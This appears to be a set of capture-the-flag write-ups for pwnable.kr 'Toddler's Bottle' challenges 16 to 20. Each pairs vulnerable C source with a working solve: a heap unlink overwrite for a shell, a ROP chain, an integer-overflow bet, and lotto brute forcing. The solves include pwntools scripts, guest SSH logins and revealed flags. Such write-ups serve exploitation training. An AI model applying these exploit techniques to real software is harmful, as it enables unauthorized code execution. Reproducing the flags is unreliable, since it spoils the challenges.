16.unlink
question
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
typedef struct tagOBJ{
struct tagOBJ* fd;
struct tagOBJ* bk;
char buf[8];
}OBJ;
void shell(){
system("/bin/sh");
}
void unlink(OBJ* P){
OBJ* BK;
OBJ* FD;
BK=P->bk;
FD=P->fd;
FD->bk=BK;
BK->fd=FD;
}
int main(int argc, char* argv[]){
malloc(1024);
OBJ* A = (OBJ*)malloc(sizeof(OBJ));
OBJ* B = (OBJ*)malloc(sizeof(OBJ));
OBJ* C = (OBJ*)malloc(sizeof(OBJ));
// double linked list: A <-> B <-> C
A->fd = B;
B->bk = A;
B->fd = C;
C->bk = B;
printf("here is stack address leak: %p\n", &A);
printf("here is heap address leak: %p\n", A);
printf("now that you have leaks, get shell!\n");
// heap overflow!
gets(A->buf);
// exploit this unlink!
unlink(B);
return 0;
}
solve
from pwn import *
p=process('./unlink')
p.recvuntil('here is stack address leak: ')
stack_addr = int(p.recvline()[:-1],16)
p.recvuntil('here is heap address leak: ')
heap_addr = int(p.recvline()[:-1],16)
shell_addr = 0x80484eb
payload=p32(shell_addr)+'A'*12+p32(stack_addr+12)+p32(heap_addr+12)
p.sendline(payload)
p.interactive()
17.blukat
question
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
char flag[100];
char password[100];
char* key = "3\rG[S/%\x1c\x1d#0?\rIS\x0f\x1c\x1d\x18;,4\x1b\x00\x1bp;5\x0b\x1b\x08\x45+";
void calc_flag(char* s){
int i;
for(i=0; i<strlen(s); i++){
flag[i] = s[i] ^ key[i];
}
printf("%s\n", flag);
}
int main(){
FILE* fp = fopen("/home/blukat/password", "r");
fgets(password, 100, fp);
char buf[100];
printf("guess the password!\n");
fgets(buf, 128, stdin);
if(!strcmp(password, buf)){
printf("congrats! here is your flag: ");
calc_flag(password);
}
else{
printf("wrong guess!\n");
exit(0);
}
return 0;
}
solve
blukat@ubuntu:~$ id
uid=1104(blukat) gid=1104(blukat) groups=1104(blukat),1105(blukat_pwn)
blukat@ubuntu:~$ cat password |./blukat
guess the password!
congrats! here is your flag: Pl3as_DonT_Miss_youR_GrouP_Perm!!
18.horcruxes
question
connect to port 9032 (nc 0 9032). the 'horcruxes' binary will be executed under horcruxes_pwn privilege.
rop it to read the flag.
solve
from pwn import *
context.log_level='debug'
s = ssh("horcruxes", "pwnable.kr", port=2222, password="guest")
r = s.remote("localhost", 9032)
e = ELF('./horcruxes')
t=[]
for i in range(ord('A'),ord('G')+1):
t.append(e.symbols[chr(i)])
addr_ropme=0x0809FFFC
payload='a'*120
for i in t:
payload+=p32(i)
payload+=p32(addr_ropme)
print('123',payload)
r.recvuntil('Select Menu:')
r.sendline('0')
r.sendline(payload)
sum=0
for i in range(7):
r.recvuntil('(EXP +')
sum += int(r.recvuntil(')')[:-1])
r.recvuntil("Menu:")
r.sendline("0")
r.recvuntil("earned? : ")
r.sendline(str(sum))
r.interactive()
19.blackjack
question
if (bet > cash) //If player tries to bet more money than player has
{
printf("\nYou cannot bet more money than you have.");
printf("\nEnter Bet: ");
scanf("%d", &bet);
return bet;
}
solve
int overflow
Enter Bet: $1000
You cannot bet more money than you have.
Enter Bet: 4293967296
flag
YaY_I_AM_A_MILLIONARE_LOL
20.lotto
question
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
unsigned char submit[6];
void play(){
int i;
printf("Submit your 6 lotto bytes : ");
fflush(stdout);
int r;
r = read(0, submit, 6);
printf("Lotto Start!\n");
//sleep(1);
// generate lotto numbers
int fd = open("/dev/urandom", O_RDONLY);
if(fd==-1){
printf("error. tell admin\n");
exit(-1);
}
unsigned char lotto[6];
if(read(fd, lotto, 6) != 6){
printf("error2. tell admin\n");
exit(-1);
}
for(i=0; i<6; i++){
lotto[i] = (lotto[i] % 45) + 1; // 1 ~ 45
}
close(fd);
// calculate lotto score
int match = 0, j = 0;
for(i=0; i<6; i++){
for(j=0; j<6; j++){
if(lotto[i] == submit[j]){
match++;
}
}
}
// win!
if(match == 6){
system("/bin/cat flag");
}
else{
printf("bad luck...\n");
}
}
void help(){
printf("- nLotto Rule -\n");
printf("nlotto is consisted with 6 random natural numbers less than 46\n");
printf("your goal is to match lotto numbers as many as you can\n");
printf("if you win lottery for *1st place*, you will get reward\n");
printf("for more details, follow the link below\n");
printf("http://www.nlotto.co.kr/counsel.do?method=playerGuide#buying_guide01\n\n");
printf("mathematical chance to win this game is known to be 1/8145060.\n");
}
int main(int argc, char* argv[]){
// menu
unsigned int menu;
while(1){
printf("- Select Menu -\n");
printf("1. Play Lotto\n");
printf("2. Help\n");
printf("3. Exit\n");
scanf("%d", &menu);
switch(menu){
case 1:
play();
break;
case 2:
help();
break;
case 3:
printf("bye\n");
return 0;
default:
printf("invalid menu\n");
break;
}
}
return 0;
}
solve
from pwn import *
#context.log_level='debug'
s = ssh("lotto", "pwnable.kr", port=2222, password="guest")
r = s.process("./lotto")
for i in range(50):
r.recvuntil('3. Exit\n')
r.sendline('1')
r.recvuntil('Submit your 6 lotto bytes :')
r.sendline('!'*6)
flag
sorry mom... I FORGOT to check duplicate numbers... :(
[Toddler’s Bottle] is over!!!
I have been very busy for a long time in the past.
But now Toddler’s Bottle is over~
GO GO GO!
